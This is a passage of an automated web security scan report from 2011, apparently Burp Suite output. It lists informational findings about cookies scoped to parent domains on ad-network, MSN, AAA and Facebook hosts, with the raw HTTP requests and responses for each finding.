Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=7664/12228&cd=false&xt=14&k=customer+support:224,games:212,game:128,gamehouse+customer:80,call+center:64,center+hours:64,chat+hours:64,support:62,download+game:60,free+game:60,customer:58,gamehouse:56,hidden+object:56,pc+games:48,time+management:48,mac+games:48,match+3:48,downloadable+games:40,download+games:40,free+games:40,game+daily:40,favorite+download:40,games+now:40,831+5895:40,email+us:40,call+us:40,866+831:40,1+866:40,us+1:40,top+games:40,support+team:36,center+hour:32,super+saver:32,object+games:32,chat+hour:32,hours:32,mortimer+beckett:24,adventure+games:24,strategy+games:24,management+games:24,&t=Contact+GameHouse+Customer+Support HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; dq=95|8|87|0; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:26:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: dq=97|8|89|0; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

13.116. http://video.msn.com/services/user/info previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.msn.com
Path:	/services/user/info

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/user/info?callback=jsonp1311088599886&responseEncoding=json&uxmkt=en-US HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Machine: CH1********302
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:35 GMT
Content-Length: 185
Connection: keep-alive

jsonp1311088599886({"user":{"country":{"name":{"$":'US'},"flags":{"$":'40000000'},"zip":{"$":'75207'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

13.117. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW4
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
content-length: 1151

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com?zip=05672">

<TITLE>www.aaa.com redirect</TITLE>
</HE
...[SNIP]...

13.118. http://www.burstnet.com/enlightn/7117//930F/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7117//930F/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:02 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7117//930F/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^13R.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:02 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:02 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.119. http://www.burstnet.com/enlightn/7121//7128/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7121//7128/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7121//7128/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:27:34 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.120. http://www.burstnet.com/enlightn/7177//7F4D/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7177//7F4D/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7177//7F4D/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:48 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.121. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

13.122. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

13.123. http://www.facebook.com/ajax/prefetch.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/prefetch.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

13.124. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.120.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 0

13.125. http://www.facebook.com/badges/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

13.126. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Thu, 18-Aug-2011 14:57:43 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=auto HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Thu, 18-Aug-2011 14:57:43 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:43 GMT
Content-Length: 0

13.127. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

13.128. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

13.129. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

13.130. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
